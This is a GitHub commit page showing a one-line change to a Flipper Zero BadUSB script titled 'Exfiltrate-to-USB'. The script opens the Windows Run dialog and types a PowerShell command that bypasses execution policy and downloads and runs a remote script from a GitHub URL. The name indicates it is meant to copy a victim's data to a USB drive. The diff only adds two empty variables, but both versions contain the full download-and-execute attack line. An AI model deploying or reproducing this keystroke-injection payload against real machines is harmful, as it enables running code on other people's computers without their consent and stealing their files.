Update Exfiltrate-to-USB.txt

This commit is contained in:
egieb
2023-12-29 23:54:44 +00:00
committed by GitHub
parent 1041117be5
commit 683f0a69f0
+1 -1
View File
@@ -11,6 +11,6 @@ REM open powershell
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Exfiltrate-to-USB/main.ps1 | iex
STRING powershell -NoP -Ep Bypass -C $driveName = ''; $Hidden = ''; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Exfiltrate-to-USB/main.ps1 | iex
ENTER